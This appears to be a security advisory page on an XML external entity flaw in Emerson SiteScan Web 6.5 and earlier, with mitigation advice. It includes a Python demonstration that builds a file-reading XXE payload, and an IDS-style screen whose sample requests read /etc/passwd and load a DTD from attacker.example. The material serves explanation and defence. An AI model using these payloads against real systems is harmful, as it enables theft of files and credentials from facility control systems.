OTPulse

Emerson Liebert SiteScan XML External Entity Vulnerability

CVSS 7.5 · ICS-CERT ICSA-16-334-01 · Sep 2, 2016
Attack Vector: Network
Auth Required: None
Complexity: Low
User Interaction: None needed
Summary

Emerson Liebert SiteScan Web versions 6.5 and earlier contain an XML external entity (XXE) injection vulnerability in their XML parsing functionality. An unauthenticated attacker who can reach the web application can send a crafted XML request that declares an external entity pointing at a file on the server; the parser resolves the entity and returns the file's contents, potentially exposing system configuration, credentials, or other confidential data. The product is end-of-life and the vendor has not planned security updates.

What this means
What could happen
An attacker with network access to SiteScan Web could read files that the web application's service account can access, such as configuration data or stored credentials, by abusing the XML parser's handling of external entities. That information could then be used to compromise the facility monitoring and control systems SiteScan Web fronts.
Who's at risk
Water utilities, electric utilities, and other industrial facilities using Emerson SiteScan Web for facility monitoring and HVAC system management. This includes any organization relying on SiteScan Web for remote access to facility automation systems.
How it could be exploited
An attacker sends a specially crafted XML request to SiteScan Web whose DOCTYPE declares an external entity with a SYSTEM identifier pointing at a file on the server. The application's XML parser resolves external entities rather than rejecting or ignoring them, so the file's contents are substituted into the document and echoed back in the response, allowing the attacker to retrieve arbitrary files the application can read from the server filesystem.
Prerequisites
  • Network access to SiteScan Web application port
  • SiteScan Web version 6.5 or earlier
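The mechanism described above, as an added example that is not part of the OTPulse advisory or of any Emerson code: the same XXE request is fed to a parser that resolves external general entities (the vulnerable configuration) and to one that does not. It uses only the Python standard library, because xml.sax's expat reader exposes that setting directly as feature_external_ges. The request layout, the <field> element and the "configuration file" are constructed for the demonstration; SiteScan Web's actual request format is not described on this page.

```python
"""XXE file read against a permissive XML parser, and the hardened default.

Added example (not part of the OTPulse advisory or any Emerson code). Only the
Python standard library is used: xml.sax's expat reader has a switch,
feature_external_ges, that decides whether external general entities are
fetched. The request layout, the <field> element and the 'secret' file are
constructed for the demonstration; SiteScan Web's real XML schema is not
described on the page.
"""
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class FieldCollector(ContentHandler):
    """Collects the text of every <field> element the parser emits."""

    def __init__(self):
        super().__init__()
        self.fields = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "field":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "field":
            self.fields.append("".join(self._buf))
            self._buf = None


def xxe_payload(target_path):
    """Build the kind of request the advisory describes: a DOCTYPE that declares
    an external general entity naming a local file, then references it in the body."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE request [\n"
        f'  <!ENTITY secret SYSTEM "{target_path}">\n'
        "]>\n"
        "<request><field>&secret;</field></request>\n"
    )


def parse_fields(xml_text, resolve_external_entities):
    """Parse `xml_text` and return the text of each <field>.

    resolve_external_entities=True reproduces the vulnerable configuration: the
    parser opens whatever SYSTEM identifier the request names and splices the
    file contents into the document. False (the stdlib default since Python
    3.7.1) leaves the entity unexpanded, so the field comes back empty.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = FieldCollector()
    parser.setContentHandler(handler)
    parser.feed(xml_text.encode("utf-8"))
    parser.close()
    return handler.fields


def demo():
    """Return (leaked, hardened): what each configuration yields for one request."""
    # Constructed stand-in for a configuration file on the server.
    with tempfile.NamedTemporaryFile("w", suffix=".cfg", delete=False) as cfg:
        cfg.write("db_user=sitescan\ndb_password=hunter2")
        cfg_path = cfg.name
    try:
        payload = xxe_payload(cfg_path)
        leaked = parse_fields(payload, resolve_external_entities=True)
        hardened = parse_fields(payload, resolve_external_entities=False)
    finally:
        os.remove(cfg_path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demo()
    print("vulnerable parser returned:", leaked)
    print("hardened parser returned:  ", hardened)
```

Running it prints the contents of the constructed file from the permissive parser and an empty field from the hardened one. Every mainstream XML library has an equivalent switch under its own name (disallowing DOCTYPE declarations, or turning off external entity and DTD loading); whichever library a product embeds, that setting is what the parser-configuration workaround further down is asking for.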
Tags: remotely exploitable · no authentication required · low complexity · no patch available · information disclosure risk
Exploitability
Low exploit probability (EPSS 0.4%). EPSS estimates the chance of exploitation activity being observed in the next 30 days; it says nothing about how easy the flaw is to exploit once an attacker reaches the application.
Affected products (1)
Product       | Affected Versions | Fix Status
SiteScan Web  | ≤ 6.5             | No fix (EOL)
Remediation & Mitigation
Do now
Hardening: Isolate SiteScan Web from untrusted networks using network segmentation or firewall rules that allow only the administrative hosts that need access.
Workaround: Disable external entity resolution and external DTD loading in the XML parser if the application exposes those parser settings. For an end-of-life product, confirm that the setting actually exists and takes effect rather than assuming it does.
Schedule (requires maintenance window)

There is no patch to apply. The replacement or upgrade planned below will take facility monitoring offline, so schedule it in a maintenance window and plan for process interruption.

Hardening: Implement network-based intrusion detection rules to alert on XXE attack patterns (DOCTYPE declarations carrying SYSTEM or PUBLIC entity identifiers) in requests sent to SiteScan Web.
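What such a rule looks for, as an added example (not from the advisory, from Emerson, or from any IDS product): a screen over decoded XML request bodies that flags DOCTYPE declarations with SYSTEM or PUBLIC identifiers, in the form a reverse proxy or sensor in front of SiteScan Web would apply. The sample request bodies and the request identifiers are constructed; SiteScan Web's real XML format is not on this page.

```python
"""Flag XML request bodies that declare external entities or external DTDs.

Added example, not taken from the advisory, from Emerson, or from any IDS
product. Legitimate clients of a monitoring web application have no reason to
send a DOCTYPE at all, let alone one naming a SYSTEM or PUBLIC identifier, so
the screen rates a bare DOCTYPE as unusual and an external identifier as an
XXE attempt. The sample bodies below are constructed.
"""
import re
from dataclasses import dataclass

# An entity declaration (general or parameter) with an external identifier
# inside a DOCTYPE internal subset. DOTALL lets the subset span several lines.
_EXTERNAL_ENTITY = re.compile(
    r"<!DOCTYPE\b[^>\[]*\[.*?<!ENTITY\s+(?:%\s+)?[\w.\-]+\s+(?:SYSTEM|PUBLIC)\b",
    re.IGNORECASE | re.DOTALL,
)
# A DOCTYPE that pulls in an external DTD directly.
_EXTERNAL_DTD = re.compile(
    r"<!DOCTYPE\s+[\w.\-]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)
_ANY_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)


@dataclass
class Verdict:
    request_id: str
    severity: str  # "high", "medium" or "none"
    reason: str


def screen_request(request_id, body):
    """Classify one decoded XML request body."""
    if _EXTERNAL_ENTITY.search(body):
        return Verdict(request_id, "high", "DOCTYPE declares an external entity")
    if _EXTERNAL_DTD.search(body):
        return Verdict(request_id, "high", "DOCTYPE loads an external DTD")
    if _ANY_DOCTYPE.search(body):
        # Internal-only DTD: not a file read, but still out of place in client traffic.
        return Verdict(request_id, "medium", "DOCTYPE present in client request")
    return Verdict(request_id, "none", "no DTD")


# Constructed sample traffic, the kind a sensor in front of SiteScan Web might see.
SAMPLE_REQUESTS = {
    "req-1": '<?xml version="1.0"?><request><field>status</field></request>',
    "req-2": ('<?xml version="1.0"?>'
              '<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]>'
              '<request><field>&x;</field></request>'),
    "req-3": ('<?xml version="1.0"?>\n<!DOCTYPE r [\n'
              '  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">\n'
              '  %dtd;\n]>\n<request/>'),
    "req-4": '<!DOCTYPE r SYSTEM "http://attacker.example/evil.dtd"><request/>',
    "req-5": ('<!DOCTYPE r [<!ENTITY site "Building A">]>'
              '<request><field>&site;</field></request>'),
}


def screen_all(requests=SAMPLE_REQUESTS):
    """Screen every body and return the verdicts in request order."""
    return [screen_request(rid, body) for rid, body in requests.items()]


if __name__ == "__main__":
    for v in screen_all():
        print(f"{v.request_id}: {v.severity:6} {v.reason}")
```

Apply the screen to the decoded body, after Content-Encoding and charset handling: a compressed or UTF-16 request will not match byte-level patterns unless the sensor normalizes it first, which is why a rule of this kind belongs on a reverse proxy or an HTTP-aware sensor rather than on raw packets.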
Mitigations - no patch available
SiteScan Web ≤ 6.5 has reached end of life. The vendor will not release a patch. Apply the following compensating controls:
Hardening: Plan replacement or upgrade of SiteScan Web, since the vendor has not planned fixes for this end-of-life product.